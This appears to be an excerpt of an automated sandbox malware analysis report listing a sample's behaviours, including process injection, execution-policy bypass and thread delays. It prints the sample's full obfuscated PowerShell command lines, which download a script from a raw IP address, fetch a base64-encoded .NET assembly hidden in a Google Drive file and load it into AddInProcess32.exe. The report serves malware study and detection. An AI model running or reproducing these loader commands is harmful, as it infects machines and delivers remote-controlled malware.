Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1591	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8259	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll

Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3892	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep count: 6062 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200	Thread sleep count: 2198 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180	Thread sleep count: 1591 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180	Thread sleep count: 8259 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3004	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

16_2_00403D74

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_0040317B mov eax, dword ptr fs:[00000030h]

16_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_00402B7C GetProcessHeap,RtlAllocateHeap,

16_2_00402B7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 415000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4A0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgi0beg4icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflqzsagicagicagicagicagicagicagicagicagicagicaglu1lbwjfcmrlzklosvrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24urgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagihpsr2dqchbflhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrflcbfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbwsxlhvnusdwludcagicagicagicagicagicagicagicagicagicagicagayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagie9jvgloslj5wsk7jyagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicjtiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagwxdvqmnht2duasagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgi0beg4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms8zns9lzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnrjriisiirftny6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyismcwwkttzdgfsvc1zbevlucgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyi='+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftny6q29tu3blq1s0lde1ldi1xs1kb0lujycpkcaojzbrywltywdlvxjsid0gzjdwahqnkyd0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dscrj3igzjdwozbryxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7mffhaw1hz2vcexrlcya9idbryxdlyknsawvudc5eb3dubg9hzerhdgeomffhaw1hz2vvcmwnkycpoycrjzbrywltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkdbrywltywdlqnl0zxmpozbryxn0yxj0rmxhzya9igy3vjw8qkftrty0x1nuqvjupj5mn1y7mffhzw5krmxhzya9igy3vjw8qkftrty0x0vord4+zjdwoycrjzbryxn0yxj0sw5kzxggpsawuwfpbwfnjysnzvrlehqusw5kzxhpzigwuwfzdgfyjysndezsywcpozbrywvuzeluzgv4id0nkycgmffhaw1hz2vuzxh0lkluzgv4t2yomffhzw5krmxhzyk7mffhc3rhcnrjbmrlecatz2ugmcatjysnyw5kidbrywvuzeluzgv4ic1ndcawuwfzdgfydeluzgv4ozbryxn0yxj0sw5kzxggkz0gmffhc3rhcnrgbgfnlkxlbmd0adswuwfijysnyxnlnjrmzw5ndgggjysnpsawuwflbmrjbmrlecatidbryxn0yxj0sw5kzxg7mccrj1fhymfzzty0q29tbwfuzca9idbrywltywdlvgv4dc5tdwjzdhjpbmcomffhc3rhcnrjbmrlecwgmffhymfzzscrjzy0tgvuz3roktswuwfiyxnlnjrszxzlcnnljysnzca9ic1qb2luicgwuwfiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgwwjjiezvckvhy2gtt2jqzwn0ihsgmffhxyb9kvstms4ulsgwuwfiyxnlnjrdb21tyscrj25klkxlbmd0acldozbrywnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcomffhymfzzty0umv2zxjzzwqpozbrywxvywrlzefzjysnc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6jysntg9hzcgwuwfjb21tyw5kqnl0zxmpozbryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qozjdwvkfjzjdwktswuwf2ywlnzxrob2qusw52b2tlkdbryw51bgwsieaozjdwdhh0lljsrvbmtvmvntmvmtqxljy3ms4zlji5ms8vonb0dghmn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigynkyc3vkfkzeluuhjvy2vzczmyzjdwlcbmn1zkzxnhdccrj2l2ywrvzjdwlcbmn1zkzxmnkydhdgl2ywrvzjdwlgy3vmrlc2f0axzhzg9mn1ysjysnzjdwzgvzyxrpdmfkb2y3vixmn1zkzxnhdgknkyd2ywrvzjdwjysnlgy3vmrlc2f0jysnaxzhzg9mn1yszjdwzgvzyxrpdmfkb2y3vixmn1yxzjdwlgy3vmrlc2f0axzhzg9mn1ypktsnks5szxbsqunfkchby2hbcl04ostby2hbcl05octby2hbcl03myksj3wnks5szxbsqunfkcdmn1ynlfttdhjjtkddw2noqxjdmzkplljlcgxbq0uokftjaefyxtq4k1tjaefyxtgxk1tjaefyxtk3kswnjccpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( ('0qaimageurl = f7vht'+'tps://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywu'+'r f7v;0qawebclient = new-object system.net.webclient;0qaimagebytes = 0qawebclient.downloaddata(0qaimageurl'+');'+'0qaimagetext = [system.text.encoding]::utf8.getstring(0qaimagebytes);0qastartflag = f7v<<base64_start>>f7v;0qaendflag = f7v<<base64_end>>f7v;'+'0qastartindex = 0qaimag'+'etext.indexof(0qastar'+'tflag);0qaendindex ='+' 0qaimagetext.indexof(0qaendflag);0qastartindex -ge 0 -'+'and 0qaendindex -gt 0qastartindex;0qastartindex += 0qastartflag.length;0qab'+'ase64length '+'= 0qaendindex - 0qastartindex;0'+'qabase64command = 0qaimagetext.substring(0qastartindex, 0qabase'+'64length);0qabase64reverse'+'d = -join (0qabase64command.tochararray() ybi foreach-object { 0qa_ })[-1..-(0qabase64comma'+'nd.length)];0qacommandbytes = [system.convert]::frombase64string(0qabase64reversed);0qaloadedas'+'sembly = [system.reflection.assembly]::'+'load(0qacommandbytes);0qavaimethod = [dnlib.io.home].getmethod(f7vvaif7v);0qavaimethod.invoke(0qanull, @(f7vtxt.rreplms/53/141.671.3.291//:ptthf7v, f7vdesativadof7v, f7vdesativadof7v, f7vdesativadof7v, f'+'7vaddinprocess32f7v, f7vdesat'+'ivadof7v, f7vdes'+'ativadof7v,f7vdesativadof7v,'+'f7vdesativadof7v,f7vdesati'+'vadof7v'+',f7vdesat'+'ivadof7v,f7vdesativadof7v,f7v1f7v,f7vdesativadof7v));').replace(([char]89+[char]98+[char]73),'\|').replace('f7v',[string][char]39).replace(([char]48+[char]81+[char]97),'$') )"
